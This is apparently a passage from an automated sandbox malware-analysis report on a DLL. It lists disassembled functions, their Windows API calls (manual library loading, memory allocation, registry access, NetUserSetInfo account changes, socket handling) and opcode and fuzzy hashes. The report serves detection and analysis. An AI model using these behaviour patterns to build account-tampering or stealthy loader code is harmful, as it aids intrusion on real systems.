                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc
                                                          • String ID: CloseHandle$KERNEL32.dll
                                                          • API String ID: 2574300362-2295661983
                                                          • Opcode ID: 2de6c06c0082ca299113b42d5527bf64b86f77828aa010fa56cfdb5699a9f8eb
                                                          • Instruction ID: cf30f3b007e41bfee70c41d9c59be6cb1b231e04fc18b526b816a338234f57c5
                                                          • Opcode Fuzzy Hash: 2de6c06c0082ca299113b42d5527bf64b86f77828aa010fa56cfdb5699a9f8eb
                                                          • Instruction Fuzzy Hash: F9C012B94112215FD724EFA4EC4C8D63A58FF44301348494DF55993211CF745840CBA0
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(KERNEL32.dll,lstrlenA), ref: 1002C05A
                                                          • GetProcAddress.KERNEL32(00000000), ref: 1002C061
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc
                                                          • String ID: KERNEL32.dll$lstrlenA
                                                          • API String ID: 2574300362-1796993502
                                                          • Opcode ID: d40042b9647b32dc2987e067e8039b869b55609119aa694a870251ee838254e7
                                                          • Instruction ID: a9383731f621fe8a41141736c67f20378d25e71117364abe4445eb65d5d345b3
                                                          • Opcode Fuzzy Hash: d40042b9647b32dc2987e067e8039b869b55609119aa694a870251ee838254e7
                                                          • Instruction Fuzzy Hash: 9AC092F8401228AFDB20AFA4DCCCE8D3A68FB453463A84544FA05A1624DB381080EA64
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $u%04x
                                                          • API String ID: 0-2846719512
                                                          • Opcode ID: 1f6d89d554986cdd82fb0e2794668e6e0531af68cd05daea2109b4fdf41f23a8
                                                          • Instruction ID: 926f1c216a8361e60bc3445ae8a78ded31acc7b6cea92631c0d95b6b2ff4fbf9
                                                          • Opcode Fuzzy Hash: 1f6d89d554986cdd82fb0e2794668e6e0531af68cd05daea2109b4fdf41f23a8
                                                          • Instruction Fuzzy Hash: A8615D616083C64FF713CE289C4075BBBD9EF962D4F28C46DE9C6C724AE761854A8352
                                                          APIs
                                                          • #825.MFC42(?,00000000,?,?,?,1001112D,00000000,000000FF,00000000,000000FF,00000000,?), ref: 100121D1
                                                          • #823.MFC42(00000000,00000000,?,?,?,1001112D,00000000,000000FF,00000000,000000FF,00000000,?), ref: 100121F6
                                                            • Part of subcall function 10012350: #540.MFC42(00000000,?,?,00000000), ref: 100123A6
                                                            • Part of subcall function 10012350: #540.MFC42(00000000,?,?,00000000), ref: 100123B3
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: #540$#823#825
                                                          • String ID:
                                                          • API String ID: 3261958014-0
                                                          • Opcode ID: 103bab456209c4811671d232b7a5f097ed692de7c0e3af0ad8c5a2e5f0cf1076
                                                          • Instruction ID: a9c2cb30c09e7b4867e33a31c74d4a8efcae7c34899988356dee3da11abaa517
                                                          • Opcode Fuzzy Hash: 103bab456209c4811671d232b7a5f097ed692de7c0e3af0ad8c5a2e5f0cf1076
                                                          • Instruction Fuzzy Hash: E041C4F6B002049BDB04CF58D88452AF795EFD4260B19C56EED09DF346DA32ECA5C7A0
                                                          APIs
                                                          • #825.MFC42(00000000), ref: 10016211
                                                          • #823.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,100989E8,000000FF), ref: 10016221
                                                          • #823.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,100989E8,000000FF), ref: 100161BC
                                                            • Part of subcall function 10015610: RegOpenKeyExA.ADVAPI32(?,?,00000000,000F003F,?), ref: 100156E2
                                                          • #825.MFC42(?), ref: 100162A9
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: #823#825$Open
                                                          • String ID:
                                                          • API String ID: 2004829228-0
                                                          • Opcode ID: a3df6c7bce3bd664df55ba16d8f86235ac18ee4999ca7d059b58045d08698e69
                                                          • Instruction ID: 655c569c95988f91d5f7fefb51b338ed70fc5e4caabb49e0d06f1a21084efced
                                                          • Opcode Fuzzy Hash: a3df6c7bce3bd664df55ba16d8f86235ac18ee4999ca7d059b58045d08698e69
                                                          • Instruction Fuzzy Hash: D541E176604A498BC708DE28DC91A6FB3D6EFC8610F88052CF9169B341DB36E949C792
                                                          APIs
                                                          • #825.MFC42(00000000), ref: 10015EB1
                                                          • #823.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,100989A8,000000FF), ref: 10015EC1
                                                          • #823.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,100989A8,000000FF), ref: 10015E5C
                                                            • Part of subcall function 10015610: RegOpenKeyExA.ADVAPI32(?,?,00000000,000F003F,?), ref: 100156E2
                                                          • #825.MFC42(?), ref: 10015F49
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: #823#825$Open
                                                          • String ID:
                                                          • API String ID: 2004829228-0
                                                          • Opcode ID: 863086ceb577e8e046724670400955c95caf26373fbb0ee98028dd31d456795c
                                                          • Instruction ID: cedb9f63144fabbe78c5edae6aed69d825cba5acb3989a48cb4ee401e1e45e39
                                                          • Opcode Fuzzy Hash: 863086ceb577e8e046724670400955c95caf26373fbb0ee98028dd31d456795c
                                                          • Instruction Fuzzy Hash: C5410275604645CBC708DE28C891A6BB3D5FBC8611F88052CF9568F341EB36EA49C793
                                                          APIs
                                                          • #825.MFC42(00000000), ref: 10015CE3
                                                          • #823.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,10098988), ref: 10015CF7
                                                          • #823.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,10098988), ref: 10015C88
                                                            • Part of subcall function 10015610: RegOpenKeyExA.ADVAPI32(?,?,00000000,000F003F,?), ref: 100156E2
                                                          • #825.MFC42(00000000), ref: 10015D76
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: #823#825$Open
                                                          • String ID:
                                                          • API String ID: 2004829228-0
                                                          • Opcode ID: 5309c18a2858c9b49ac7718b0067aba9fcdb32927d4bedb7ac87393c1f69e640
                                                          • Instruction ID: b91cf90c60bfa160540cd2bc78dccd14f81ed57a779dc01a0b2f0f75c84c237b
                                                          • Opcode Fuzzy Hash: 5309c18a2858c9b49ac7718b0067aba9fcdb32927d4bedb7ac87393c1f69e640
                                                          • Instruction Fuzzy Hash: EF41FD35604A45DFC708DE28D89166FB3E6FBC8610F88052CF9469B351DB36E989CB92
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: #823$strstr
                                                          • String ID:
                                                          • API String ID: 3700887599-0
                                                          • Opcode ID: 1feb712d2eb87b772129509cba575338db839c6f83ad0c279dda09971329dd7f
                                                          • Instruction ID: e7a3bb7836f99c4b21098aa8e2ae082227a5993f95023b9609139f1e4e40139e
                                                          • Opcode Fuzzy Hash: 1feb712d2eb87b772129509cba575338db839c6f83ad0c279dda09971329dd7f
                                                          • Instruction Fuzzy Hash: 1721AD3A2105180B871CC97DAC1152B7AC2FBC9631B6A432EFA2BC7BD1DEA5DD058380
                                                          APIs
                                                          • IsBadReadPtr.KERNEL32(?,00000014), ref: 10006D7E
                                                          • LoadLibraryA.KERNEL32(?), ref: 10006D9A
                                                            • Part of subcall function 100069B0: GetProcessHeap.KERNEL32(00000000,?,?), ref: 100069C0
                                                            • Part of subcall function 100069B0: HeapReAlloc.KERNEL32(00000000), ref: 100069C7
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 10006E08
                                                          • IsBadReadPtr.KERNEL32(?,00000014), ref: 10006E2F
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: HeapRead$AddressAllocLibraryLoadProcProcess
                                                          • String ID:
                                                          • API String ID: 2932169029-0
                                                          • Opcode ID: 0bb20e24d639ff234c6774ad8937788d10a102b94a8500d5cb44c64d04d593d7
                                                          • Instruction ID: 24d0788afd7e564c21ce07679b2cd919d25d482a3edf121e110520330544f2d5
                                                          • Opcode Fuzzy Hash: 0bb20e24d639ff234c6774ad8937788d10a102b94a8500d5cb44c64d04d593d7
                                                          • Instruction Fuzzy Hash: 2C317E76B007069FE310CF29CC80A56B7E9FF493A4B26462AE919C7255EB31E815CB90
                                                          APIs
                                                          • ceil.MSVCRT ref: 10001D8C
                                                          • _ftol.MSVCRT ref: 10001D95
                                                          • VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004,?,?,?,?,?,?,?,?,1001B646,?,000003C0), ref: 10001DA9
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocVirtual_ftolceil
                                                          • String ID:
                                                          • API String ID: 3317677364-0
                                                          • Opcode ID: a938f9c99390067515d5bb401682070dd3e948cd9475bed688cee5d7a00ad51b
                                                          • Instruction ID: 80e73f680275ecb85cea3faadb907318f444ef36128b6434ffe1c43a84600ab4
                                                          • Opcode Fuzzy Hash: a938f9c99390067515d5bb401682070dd3e948cd9475bed688cee5d7a00ad51b
                                                          • Instruction Fuzzy Hash: 9911E4757083009BE704DF28EC8275ABBE4FBC03A1F04853EFD498B395DA75A809CA65
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _ftolceil
                                                          • String ID:
                                                          • API String ID: 2006273141-0
                                                          • Opcode ID: c13413cdfef608f17b66785ed65de3a9914b1a525c6f880948e7d8bc7dc34384
                                                          • Instruction ID: 62e5b31a19e4efc706719f2d7f8223bc0b5f5341a1f9df7ec71081677a67e64d
                                                          • Opcode Fuzzy Hash: c13413cdfef608f17b66785ed65de3a9914b1a525c6f880948e7d8bc7dc34384
                                                          • Instruction Fuzzy Hash: 2911A2756483049BE704EF28EC8676FBBE1FB84791F04853DF9498B344DA36A818C666
                                                          APIs
                                                          • LocalSize.KERNEL32(00000000), ref: 10015AAE
                                                          • LocalFree.KERNEL32(00000000), ref: 10015ABA
                                                          • LocalSize.KERNEL32(00000000), ref: 10015AD5
                                                          • LocalFree.KERNEL32(00000000), ref: 10015AE1
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Local$FreeSize
                                                          • String ID:
                                                          • API String ID: 2726095061-0
                                                          • Opcode ID: c0206f096c02150c192f086eedc162ceac66f92a3276f0c0eb43a5dbeb93a699
                                                          • Instruction ID: 9d4eaa0da794f1e2b3889d11efc9f421fde940f342979db69ca44634e0eb0258
                                                          • Opcode Fuzzy Hash: c0206f096c02150c192f086eedc162ceac66f92a3276f0c0eb43a5dbeb93a699
                                                          • Instruction Fuzzy Hash: 2E11EEB9204654DBC221DB14CC91BBFB3D8FF85251F880629F9915F281DF39EC8586AA
                                                          APIs
                                                          • FreeLibrary.KERNEL32(?,00000000,00000000,?,10006B17,00000000), ref: 10006F50
                                                          • VirtualFree.KERNEL32(5D5E5FC0,00000000,00008000,?,10006B17,00000000), ref: 10006F77
                                                          • GetProcessHeap.KERNEL32(00000000,10006B17,?,10006B17,00000000), ref: 10006F80
                                                          • HeapFree.KERNEL32(00000000), ref: 10006F87
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Free$Heap$LibraryProcessVirtual
                                                          • String ID:
                                                          • API String ID: 548792435-0
                                                          • Opcode ID: 9122a4d877bc4996ce9b38b24836df32d42650a468764ef7b8b38eca707a3637
                                                          • Instruction ID: eb7fda223cfc753f1fed3d2c8a6d49319030a12fba69635afc4c9d01848446bd
                                                          • Opcode Fuzzy Hash: 9122a4d877bc4996ce9b38b24836df32d42650a468764ef7b8b38eca707a3637
                                                          • Instruction Fuzzy Hash: E8112A756007129BE720CF69DC84F57B3E9BF48790F154A28F56AD7694DB30F8418B60
                                                          APIs
                                                          • mbstowcs.MSVCRT ref: 10025257
                                                          • NetUserSetInfo.NETAPI32(00000000,?,000003F0,?,00000000,?,?,?), ref: 1002528E
                                                          • Sleep.KERNEL32(00000064,00000000,?,000003F0,?,00000000,?,?,?), ref: 100252B2
                                                            • Part of subcall function 10025700: LocalSize.KERNEL32(00000000), ref: 10025710
                                                            • Part of subcall function 10025700: LocalFree.KERNEL32(00000000,?,10025C00,00000001,?,00000000,00000001,?,?), ref: 10025720
                                                          • LocalFree.KERNEL32(?,?,?,?), ref: 100252C4
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                           • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Local$Free$InfoSizeSleepUsermbstowcs
                                                          • String ID:
                                                          • API String ID: 2733533-0
                                                          • Opcode ID: 6a9604ccc34c4b0797383264fcae3a00f4c44b13357fa65a3340c00f3e20fbd0
                                                          • Instruction ID: 15c901b137dd358fda9146c8f6f94cc6f523190a05e50031364fc71d2f867a2a
                                                          • Opcode Fuzzy Hash: 6a9604ccc34c4b0797383264fcae3a00f4c44b13357fa65a3340c00f3e20fbd0
                                                          • Instruction Fuzzy Hash: 02110835218301ABE714CB28DC85FDB77D9AFD8705F044A2DF585822D1EBB4E54C8693
                                                          APIs
                                                          • WaitForSingleObject.KERNEL32(?,000000FF,00000000,00000000,?,00000000,10097CDC,000000FF,1001DDF6), ref: 100049DC
                                                          • CloseHandle.KERNEL32(?), ref: 100049FF
                                                          • CloseHandle.KERNEL32(?), ref: 10004A08
                                                          • WSACleanup.WS2_32 ref: 10004A0A
                                                            • Part of subcall function 10004F20: setsockopt.WS2_32(?,0000FFFF,00000080,00000000), ref: 10004F4A
                                                            • Part of subcall function 10004F20: CancelIo.KERNEL32(?), ref: 10004F57
                                                            • Part of subcall function 10004F20: InterlockedExchange.KERNEL32(?,00000000), ref: 10004F66
                                                            • Part of subcall function 10004F20: closesocket.WS2_32(?), ref: 10004F73
